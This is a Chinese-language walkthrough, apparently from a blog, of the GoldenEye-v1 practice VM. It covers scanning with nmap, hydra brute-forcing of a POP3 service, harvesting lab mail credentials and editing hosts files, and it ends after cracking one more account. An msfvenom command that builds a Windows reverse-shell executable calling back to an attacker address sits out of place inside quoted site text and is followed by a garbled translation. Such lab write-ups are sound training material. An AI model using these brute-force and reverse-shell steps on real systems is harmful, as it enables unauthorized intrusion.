普通靶机1-GoldenEye-v1
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;"><span style="color: black;"><span style="color: black;">1、</span>配置网络</span></strong></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·</span><span style="color: black;">VMWare</span><span style="color: black;">的“虚拟网络编辑器”设置“</span><span style="color: black;">NAT</span><span style="color: black;">模式”</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPib7icTMfDnLu4ibyzbcM8iahKogiaictzMShI5Ibc9ffeE08sd3KIFMaUds25zhcQsqmC6zGExgzHMViaug/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·虚拟机给的是“仅主机模式”,需要更改为NAT模式</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·查看虚拟机MAC<span style="color: black;">位置</span>:</span><span style="color: black;">“虚拟机”</span><span style="color: black;">-></span><span style="color: black;">“设置”</span><span style="color: black;">-></span><span style="color: black;">“网络适配器”</span><span style="color: black;">-></span><span style="color: black;">“高级”</span><span style="color: black;">->mac</span><span style="color: black;"><span style="color: black;">位置</span><span style="color: black;">(局域网<span style="color: black;">检测</span><span style="color: black;">目的</span></span><span style="color: black;">ip</span><span style="color: black;"><span style="color: black;">是不是</span>找正确)</span></span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;"><span style="color: black;">2、</span>渗透</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">1</span><span style="color: black;">、</span><span style="color: black;">探测</span><span style="color: black;">ip</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·</span><span style="color: black;">netdiscover -r 192.168.</span><span style="color: black;"><span style="color: black;">153</span></span><span style="color: black;">.0/24</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaGlBbdvA58tu9oURHAhv6KAnAticunV1a6jquVPZ3KYP8ibBaTp5NSGZg/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·找到<span style="color: black;">目的</span></span><span style="color: black;">ip</span><span style="color: black;">:</span><span style="color: black;">192.168.153.135</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">2</span><span style="color: black;">、探测端口</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·</span><span style="color: black;">nmap -sS -sV -T5 -A 192.168.</span><span style="color: black;"><span style="color: black;">153.135</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiac4CKfq9B5A6S5yP5VK7rCuIQj2B4LqenAEUQXIrUGjAFqj7YWxcsYQ/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·<span style="color: black;">发掘</span>开放</span><span style="color: black;">80</span><span style="color: black;">,</span><span style="color: black;">25</span><span style="color: black;">端口</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·探测<span style="color: black;">所有</span>端口:</span><span style="color: black;">nmap -p 0-65535 192.168.</span><span style="color: black;"><span style="color: black;">153.135</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaJPBUlIeyLyHMDriaibZLubLtlF9CDud6Y0xJ6VBGibeQ6rlW3MLQ4xoOw/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">3</span><span style="color: black;">、探测</span><span style="color: black;">80</span><span style="color: black;">端口网站并利用探测到的信息</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·<span style="color: black;">能够</span>看到提示了<span style="color: black;">目的</span>目录:</span><span style="color: black;">/sev-home/</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFia3JVfvoVu9oSRclzGxJKuv2PqDZCz9icvIABlZNnxtickxpGDGgkeciccA/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·扫描目录(没找到什么有用的)</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaphOgmOUlEpj9XOibCGpWLHVjNo8ttUsjM729l7KTdOGWWuRaDvribIGg/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·查看页面源码(<span style="color: black;">触及</span>到的</span><span style="color: black;">css</span><span style="color: black;">和</span><span style="color: black;">js</span><span style="color: black;">文件都点开<span style="color: black;">瞧瞧</span>)</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaRPgWf8w9kDjP8sRlgKwTWBpA8CKvgHnS8FGueIaVQvdpu1xLMGvrCw/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·得到下列内容</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;">Boris, make sure you update your default password.</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;">My sources say MI6 maybe planning to infiltrate.</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;">Be on the lookout for any suspicious network traffic....</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;">I encoded you p@ssword below...</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> InvincibleHack3r</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">BTW Natalya says she can break your codes</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> (密文自动被公众号解析了)</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·得到用户</span><span style="color: black;">Boris</span><span style="color: black;">,</span><span style="color: black;">Natalya</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;">Boris</span><span style="color: black;">,<span style="color: black;">保证</span>你更新了默认<span style="color: black;">秘码</span>。</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;">我的<span style="color: black;">信息</span><span style="color: black;">源自</span>说军情六处可能计划渗透。</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">警觉</span>任何可疑的网络流量。。。。</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">我在下面给你编码了</span><span style="color: black;">p@sword</span><span style="color: black;">。。。</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;"> InvincibleHack3r</span><span style="color: black;">(<span style="color: black;">html</span><span style="color: black;">解码</span>)</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;"> 顺便说一句,</span><span style="color: black;">Natalya</span><span style="color: black;">说她<span style="color: black;">能够</span>破解你的<span style="color: black;">秘码</span></span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·<span style="color: black;">因此</span>得到账户:</span><span style="color: black;">Boris</span><span style="color: black;">(</span><span style="color: black;">boris</span><span style="color: black;">),</span><span style="color: black;">InvincibleHack3r</span><span style="color: black;">(</span><span style="color: black;">invincibleHack3r</span><span style="color: black;">)</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·测试得到正确账户:</span><span style="color: black;">boris,InvincibleHack3r</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·<span style="color: black;">拜访</span>目录并登录</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·得到内容:</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">GOLDENEYE</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">msfvenom -p windows/meterpreter_reverse_tcp LHOST=</span></span><span style="color: black;"><span style="color: black;">192.168.153.129</span></span><span style="color: black;"> <span style="color: black;">LPORT=</span></span><span style="color: black;"><span style="color: black;">4444</span></span><span style="color: black;"> <span style="color: black;">-f exe -o new.exe -i 5</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·翻译</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;">金眼</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">GoldenEye</span><span style="color: black;">是一个绝密的苏联定向武器项目。<span style="color: black;">因为</span>您有<span style="color: black;">拜访</span>权限,您肯定持有绝密许可,有资格<span style="color: black;">作为</span>认证的</span><span style="color: black;">GoldenEye</span><span style="color: black;">网络运营商(</span><span style="color: black;">GNO</span><span style="color: black;">)</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">请发送电子邮件给合格的</span><span style="color: black;">GNO</span><span style="color: black;">主管,以接受在线</span><span style="color: black;">GoldenEye</span><span style="color: black;">操作员培训,<span style="color: black;">作为</span></span><span style="color: black;">GoldenEye</span><span style="color: black;">系统的管理员</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">记住,<span style="color: black;">因为</span>隐式安全非常有效,<span style="color: black;">咱们</span>已将</span><span style="color: black;">pop3</span><span style="color: black;">服务配置为在非常高的非默认端口上运行</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">msfvenom-p</span><span style="color: black;">窗口</span><span style="color: black;">/</span><span style="color: black;">仪表指针</span><span style="color: black;">_</span><span style="color: black;">反向</span><span style="color: black;">tcp LHOST=192.168.153.129 LPORT=4444-f exe-o new.exe-i 5</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·得知有</span><span style="color: black;">pop3</span><span style="color: black;">服务,<span style="color: black;">按照</span>前面的提示:有默认<span style="color: black;">秘码</span>,尝试暴力破解</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">hydra -L </span><span style="color: black;"><span style="color: black;">[</span><span style="color: black;">可能的用户名</span><span style="color: black;">txt]</span></span><span style="color: black;"> -P /usr/share/wordlists/fasttrack.txt 192.168.</span><span style="color: black;"><span style="color: black;">153</span></span><span style="color: black;">.</span><span style="color: black;"><span style="color: black;">135</span></span><span style="color: black;"> -s 55007 pop3 -vV</span><span style="color: black;"> <span style="color: black;">(</span></span><span style="color: black;">//-L<span style="color: black;">文本 </span><span style="color: black;">-l </span><span style="color: black;">是用户名 </span><span style="color: black;">- p</span><span style="color: black;"><span style="color: black;">秘码</span> </span><span style="color: black;">-vV </span><span style="color: black;">会<span style="color: black;">表示</span>每一条线程</span></span><span style="color: black;">)</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaUDgOnvwib5vM19BN0YcjmzpsxOU59SPXgAsXDeaf0XdjFTC3zHhrjaA/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaLVhddXmj7MvTY4QibMt2Q50DbjazAG5ic8CIPpeJbdPPJE1CfsviaWcQQ/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiauic3YNUUB0ExRdzNsrYan8bXeFJE8mJTbLusIicy3UfMmic4VQpEPKYzQ/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·爆破得到用户:<span style="color: black;">boris/secret1<span style="color: black;">,</span></span></span><span style="color: black;">Boris/secret1</span><span style="color: black;">!,</span><span style="color: black;">natalya</span><span style="color: black;"><span style="color: black;">/</span></span><span style="color: black;">bird<span style="color: black;">,</span></span><span style="color: black;">Natalya</span><span style="color: black;"><span style="color: black;">/</span></span><span style="color: black;">bird</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·登录查看pop3信箱</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">list</span><span style="color: black;"><span style="color: black;">能够</span>列举数量</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">retr 1 //</span><span style="color: black;">看<span style="color: black;">第1</span>封</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·账户:<span style="color: black;">boris/secret1</span></span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Boris, this is admin. You can electronically communicate to co-workers and students here. Im not going to scan emails for security risks because I trust you and the other admins here.</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaf2dKjF3Qs9ibZWYM4exYvSzrhHRS9xqCkYCXVzfHJwGKAljBd3D80Lw/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaVB3zTSK8XNMczqaJX1ibI8MiaaviazBYZZErhN6uRUdZKZ1dNX82MNLYw/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·账户:<span style="color: black;">Boris/secret1</span>!</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFia8pzlt7z25tzoPYqTZWavwX9v8G7kfpBzC8FMDk6dcrhUdOrySqqyFA/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaNQGRibH1wXemc0uIiaXHgvybyk6kvUGaY96ynKnRiaGeHbERibicrRBHZVA/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·账户:</span><span style="color: black;">natalya</span><span style="color: black;"><span style="color: black;">/</span></span><span style="color: black;">bird</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaFpNib1M3NXqr14EibxDkDD3VjxUXyBTL8KmloZmRtjraGLt2SM7tvUVw/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p><span style="color: black;"><span style="color: black;">·</span><span style="color: black;"><span style="color: black;"><span style="color: black;">第1</span>封邮件:</span> <span style="color: black;">娜塔莉亚,请你停止破解鲍里斯的<span style="color: black;">秘码</span>。</span></span><span style="color: black;"><span style="color: black;">另外</span>,您是</span><span style="color: black;"> GNO </span><span style="color: black;">培训主管。</span><span style="color: black;"><span style="color: black;">一旦学生被指定给你,我就会给你发电子邮</span> <span style="color: black;">件。</span> <span style="color: black;"><span style="color: black;">另外</span>,请<span style="color: black;">重视</span>可能的网络漏洞。</span></span><span style="color: black;"><span style="color: black;">咱们</span>获悉,一个名为</span><span style="color: black;"> Janus </span><span style="color: black;">的犯罪集团正在追捕</span><span style="color: black;"> GoldenEye</span><span style="color: black;">。</span></span><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;">·账户:</span></span><span style="color: black;">Natalya</span><span style="color: black;"><span style="color: black;">/</span></span><span style="color: black;">bird</span></span></span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/Ox1T7Q9XhPibpicXWN7Ggic1N4e2buL9KFiaaauwvquZU7Ix5wDny9Y43o6trrlDx3YRad4gOpZTx7xDyHxvTDDngQ/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p><span style="color: black;"><span style="color: black;">·</span>第二封邮件:好的,Natalyn 我有一个新学生给你。<span style="color: black;">因为</span>这是一个新系统,<span style="color: black;">倘若</span>您看到任何配置问题,请告诉我或boris,尤其是它与安全<span style="color: black;">相关</span>的问题……即使不是,<span style="color: black;">亦</span>只需以“安全”为幌子输入……它就会 <span style="color: black;">容易</span>升级变更简单:) 好的,用户信用是:用户名:xenia <span style="color: black;">秘码</span>:RCP90rulez!鲍里斯验证了她是一个有效的承包商,<span style="color: black;">因此</span>只需创建帐户好吗?<span style="color: black;">倘若</span>您<span style="color: black;">无</span><span style="color: black;">外边</span>内部域的 URL:severnaya-station.com/gnocertdir **请务必编辑您的主机文件,<span style="color: black;">由于</span>您<span style="color: black;">一般</span>在远程离线工作.... <span style="color: black;">因为</span>您是 Linux 用户,<span style="color: black;">因此呢</span>只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·在第二封邮件看到了一个用户名<span style="color: black;">秘码</span>,此服务器域名和网站,还<span style="color: black;">需求</span><span style="color: black;">咱们</span>在本地服务<span style="color: black;">hosts</span>中添加域名信息</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">用户名:</span><span style="color: black;">xenia</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;"><span style="color: black;">秘码</span>:</span><span style="color: black;">RCP90rulez!</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">域:</span><span style="color: black;">severnaya-station.com</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">网址:</span><span style="color: black;">severnaya-station.com/gnocertdir</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·添加</span><span style="color: black;">hosts</span><span style="color: black;">信息</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·</span><span style="color: black;">ctrl+O</span><span style="color: black;"><span style="color: black;">保留</span>、</span><span style="color: black;">ctrl+X</span><span style="color: black;">退出编辑</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·写入成功</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·<span style="color: black;">拜访</span></span><span style="color: black;">url</span><span style="color: black;">:</span><span style="color: black;">severnaya-station.com/gnocertdir</span><span style="color: black;">,找到登录页面</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·输入用户信息,<span style="color: black;">而后</span>进入,得到一个用户</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·<span style="color: black;">这儿</span>的意思是:有一个用户,说不要再<span style="color: black;">这儿</span>发<span style="color: black;">信息</span>,要去发邮件。说明这是一个邮件用户</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·爆破</span><span style="color: black;">doak</span><span style="color: black;">和</span><span style="color: black;">Doak</span><span style="color: black;">用户<span style="color: black;">秘码</span>:</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">hydra -L </span><span style="color: black;"><span style="color: black;">doak</span></span><span style="color: black;"> -P /usr/share/wordlists/fasttrack.txt 192.168.</span><span style="color: black;"><span style="color: black;">153</span></span><span style="color: black;">.</span><span style="color: black;"><span style="color: black;">135</span></span><span style="color: black;"> -s 55007 pop3 -vV</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·爆破出来<span style="color: black;">秘码</span>:</span><span style="color: black;">doak</span><span style="color: black;">,</span><span style="color: black;">goat</span><span style="color: black;">,查看邮件</span></span></p>
